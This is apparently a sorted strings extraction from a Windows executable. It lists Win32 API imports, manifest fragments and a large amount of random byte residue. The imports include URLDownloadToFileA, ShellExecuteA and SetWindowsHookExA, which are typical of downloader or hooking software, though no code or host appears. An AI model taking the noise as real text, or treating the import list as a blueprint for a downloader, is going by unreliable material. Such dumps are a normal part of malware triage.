RedrawWindow
r\EDvaJ
RegCloseKey
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
ReleaseCapture
ReleaseDC
.relo2
RemoveMenu
RemovePropA
        <requestedExecutionLevel
      <requestedPrivileges>
        </requestedPrivileges>
ResetEvent
RestoreDC
RfJUQg
R<j6Ed
>R?_?j?y?
 r;#R[l
RtlUnwind
@ru`nd?
;r;v;z;~;
{rYhcf
 RyJ<A
]~S	1-=
s7dyUqE>
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SaveDC
@s&cAn-
ScreenToClient
ScrollWindow
    </security>
    <security>
_sEDp]
SelectObject
SelectPalette
SendMessageA
SetActiveWindow
SetBkColor
SetBkMode
SetBrushOrgEx
SetCapture
SetClassLongA
SetCursor
SetDIBColorTable
SetEndOfFile
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetMenu
SetMenuItemInfoA
SetParent
SetPixel
SetPropA
SetRect
SetROP2
SetScrollInfo
SetScrollPos
SetScrollRange
SetStretchBltMode
SetTextColor
SetThreadLocale
SetTimer
SetViewportOrgEx
SetWindowLongA
SetWindowOrgEx
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
SetWindowTextA
s]FFs]F
SFH#Mc
s]F s]F
sH #B6
shell32.dll
ShellExecuteA
SHFolder.dll
SHGetFolderPathA
ShowCursor
ShowOwnedPopups
ShowScrollBar
ShowWindow
SizeofResource
sJs]L2s
	s`NbyeO
sS"pwW$
StretchBlt
< =S=u=
SUVWj"j
SysAllocStringLen
SysFreeString
SysReAllocStringLen
SystemParametersInfoA
sz_?,c
:sZk*8
|sZq&k
t)7 +X
tAd+	6Rz
tDffff`ww
<T=\=d=l=t=|=
TEq)aa
tFdfpxh
This program must be run under Win32
t^Hw{fQ
t^Hx{fQ
TlsGetValue
TlsSetValue
=<T/M$
Tn#uD,
 tq1ER
TrackPopupMenu
TranslateMDISysAccel
TranslateMessage
t;R\e|p
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
|tt'Eq
t$(WVj
tx"7Ms
t%yON"y
        type="win32"
&){u00"}
u}}0hJd
?U?]?c?o?w?
UE_[Ic}t
UEvF.I
UEvJ"Q
:*:U:g:
          uiAccess="false"/>
uLar	CE
UnhandledExceptionFilter
UnhookWindowsHookEx
u.(-no
UnrealizeObject
UnregisterClassA
UpdateWindow
URLDownloadToFileA
URLMON.DLL
user32.dll
-uw2ZN/
|v(:$(
V@_^][
Va>88dT[2
VariantChangeType
VariantClear
VariantCopy
VariantInit
:.:V:b:w:
+vCKXRiK[
VC)pfT<
<V<d<r<
VerQueryValueA
        version="6.0.0.0"
version.dll
%/VI\/
VirtualAlloc
VirtualFree
VirtualQuery
Vp@1;[2x
VRh}lI
VRPQh 
VRPQj 
vS0GkT
vU"fxW#
vU"sxW#suU"
w2f1g9=
W7ALG;
WaitForSingleObject
WaitMessage
w{D/J11
\	 WH<W
_WHz@:
WideCharToMultiByte
WindowFromPoint
WinHelpA
=w"jYQb>
W =.	k
WK$)Z}
=/=>=W=r=
WriteFile
!wrJ*I
wwwwwv
wwwwww
wwwwwww
wwwwwwww
wwwwwwwww
@wwwwwwwww
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwx
wwwwwwwwwwxo
wwwwwwwwx
wwwwwwwwxo
wwwwwwxo
wwwwwxo
wwwwxo
wx}DGJ11
< ='=]=x>
<X=^=	?
]&=?X$5
X7A~AK
x[:7]+D
xcLwzeO
?xk07[
XM\>{@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
X*p>p(
XUC3Lc
xV#,>@
}xxxx}
,#Xzv!T$
Y:$06#
y8	1*s
	YBD';M
yB|O5N
!:yCs@
_'YnkD
Yz>eq[mg
<@<{<z=
>$>]>z>
Z0$Li_#
;z<2=v=
=>=Z=a=
za2C4s
=Z?b?m?
=Z=b=q=y=
;&;Z;^;d;h;m;t;z;
;(;:;Z;l;u;
#!	Zm)
]zO:CF
ZOjkQ`
Z}p:}0
zr!`m3v
(!zUSr&,